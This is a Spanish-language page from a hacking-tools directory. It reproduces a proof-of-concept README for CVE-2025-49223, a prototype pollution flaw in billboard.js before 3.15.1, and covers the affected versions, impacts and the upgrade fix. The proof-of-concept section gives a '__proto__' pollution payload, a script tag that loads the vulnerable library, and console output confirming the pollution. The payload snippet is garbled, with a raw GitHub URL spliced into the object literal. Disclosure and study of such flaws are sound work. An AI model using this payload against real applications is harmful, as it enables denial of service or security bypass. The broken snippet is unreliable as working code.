Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49223-BillboardJS-PoC — CVE-2025-49223 - Contaminación de prototipos en Billboard.js | Kitploit
Herramientas/GitHubGitHub/louay-075/cve-2025-49223-billboardjs-poc
Análisis de VulnerabilidadesExplotaciónSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHublouay-075/cve-2025-49223-billboardjs-poc

CVE-2025-49223-BillboardJS-PoC

CVE-2025-49223 - Contaminación de prototipos en Billboard.js

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
11hace 1 añoAún no revisado

💥 CVE-2025-49223 - Contaminación de prototipos en Billboard.js

Se descubrió que las versiones de billboard.js anteriores a la 3.15.1 contienen una contaminación de prototipos a través de la función generate, lo que podría permitir a los atacantes ejecutar código arbitrario o provocar una Denegación de Servicio (DoS) mediante la inyección de propiedades arbitrarias.

Este repositorio demuestra una vulnerabilidad de contaminación de prototipos encontrada en billboard.js en las versiones anteriores a 3.15.1, divulgada como CVE-2025-49223.


📌 Resumen

  • Tipo de vulnerabilidad: Contaminación de prototipos
  • Biblioteca afectada: billboard.js
  • Versiones afectadas: <= 3.14.0
  • Versión corregida: >= 3.15.1
  • ID de CVE: CVE-2025-49223
  • Impacto: ejecutar código arbitrario o provocar una Denegación de Servicio

🧪 Prueba de Concepto (PoC)

Abra index.html en un navegador y revise el registro de la consola para comprobar los intentos de contaminación de prototipos.

Cargar la versión vulnerable:

root@kitploit:~
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>

Intento de contaminación:

root@kitploit:~
{
  ["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
    polluted: "polluted_via_string_key"
  }
}

Salida de consola:

root@kitploit:~
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key

Esto confirma que un atacante puede contaminar Object.prototype, lo que afecta a cualquier objeto futuro creado en la página.


🔥 Impacto

Una explotación exitosa puede provocar:

  • Inyección de claves arbitrarias en todos los objetos
  • Alteración de la lógica de renderizado de gráficos
  • Fallos de la aplicación (DoS)
  • Posibilidad de evasión de la seguridad en aplicaciones que dependen de la fusión insegura de objetos


🛡️ Mitigación

  • ✅ Actualice billboard.js a la versión 3.15.1 o posterior

🧱 Referencias

  • 🔗 CVE-2025-49223 en NVD
  • 🔗 Notas de la versión 3.15.1 de Billboard.js


⚠️ Descargo de responsabilidad: Este PoC es solo para fines educativos y de investigación. Úselo de manera responsable.

Descargar herramienta